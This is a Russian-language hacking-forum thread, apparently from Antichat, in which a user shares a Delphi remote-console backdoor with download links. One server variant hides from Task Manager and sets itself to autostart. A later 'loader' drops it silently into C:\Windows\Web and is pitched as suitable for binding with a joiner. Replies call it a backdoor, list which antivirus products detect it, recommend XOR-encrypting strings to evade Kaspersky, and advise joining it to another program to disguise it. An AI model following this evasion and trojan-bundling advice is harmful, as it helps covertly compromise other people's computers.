![]() |
Оцените мое творение
Программа состоит из клиента и сервера, представляет собой удаленную консоль (терминальное управление компьютером). Выкладываю впервые. (Special For Antichat, как говорица :))
rmcn.zip remcon.rar содержит клиент и сервер. Сервер без формы, легко завершается из диспетчера задач. remcon_t.rar - вариант сервера, который не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой Код:
taskkill /im remcon.exe /fВид клиента: http://www.kbrdhook.com/images/screenshots/remcon.jpg Жду отзывов и предложений. З.Ы. Скачать расширенную справку по командам консоли Windows |
идея неплохая лови +
тока вот с кодировкой там какой то косяк... вместо нормальных букв какие то буквы зю) поправь ) |
Это косяк винды. Нужно создать reg файл с таким содержанием:
Код:
Windows Registry Editor Version 5.00З.Ы. Если что, смогу выложить исходники. Написано на Delphi +KOL |
ок спасибо сделал как ты сказал - теперь все ок ) за за исходники будет отдельный респект ))) так что выкладывай
|
А исходники выложишь?
|
Выложил исходники (все находится по ссылке в первом посту). Напоминаю, что написано на Delphi + KOL & MCK + WinSock2 (Есть в архиве).
|
Хех... Добавил в архив еще один вариант сервера - не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой
Код:
taskkill /im remcon.exe /f |
Интересно, как долго это все будет вдали от глаз антивирусов...
|
максимум неделю, если на вирустотал кидать никто не будет (сильно сомневаюсь :) ) возможно дольше
|
На вирустотал кидать смысла нет, прогу проверило уже достаточное количество человек, доверять можно.
З.Ы. Нужно сканер диапазона сделать многопотоковым, а то медленный он сейчас |
Joker-jar к сожелению твое творение спалил сегодня каспер и AntiVir,Avast,BitDefender,DrWeb,Ikarus,NOD32
|
Цитата:
|
Нууу, программа с открытым кодом, думаю, кому надо, справятся ;)
|
Кстати, на моей практике отучить каспера от домогательств удавалось путем шифрования строк программы банальным ксором (то есть вместо myfunc('строка') использовать myfunc(decrypt('зашифрованная строка'))). В частности, каспер перестал ругаться на одну мою библиотеку после того, как я убрал явно хранящуюся константу tm = 'maskmgr.exe'. Гы
|
Цитата:
|
Сделал бы обычный Edit1.Text для ввода команд. На кой там ListBox не понимаю. Если бы там уже были забиты команды, то это да. Хотя пока её найдёшь, легче 100 раз напечатать будет.
|
Хорош Backdoor но такой медленый при скане
кокой там порт открывается? |
Порт 1666. Можно сканер сделать многопотоковым, хотя он в принципе не особо нужен. Думаю на неделе заняться новой версией
|
Кнопку "послать" нажимал?
|
А у меня глюк с кодировкой, абракодабра
|
Цитата:
|
Цитата:
http://weppc.jino-net.ru/cmd.rar |
тут ето...вопросик..
RemCon.exe на чужой комп надо один сливать или с Manager.dll |
Цитата:
Цитата:
|
Фаервол ловит жаль
|
http://ifolder.ru/2868078
RemCon Loader. При запуске выгружает RemCon.exe в папку C:\Windows\Web и запускает его. RemCon прописывается в реестре на автозагрузку и скрывает себя из диспетчера задач. При загрузке не выплевывает никаких окон, пригоден для склеивания джойнером. Написано в образовательных целях, использование в незаконных целях запрещено! |
Пароль на архив - antichat
|
Палится Nodом.
|
Цитата:
|
извините а как мне иконку на remconloader устанавит
|
wedmak_ss, джойнь его с какой-нибудь прогой, большинство джойнеров и иконку позволяют указать.
|
| Время: 18:40 |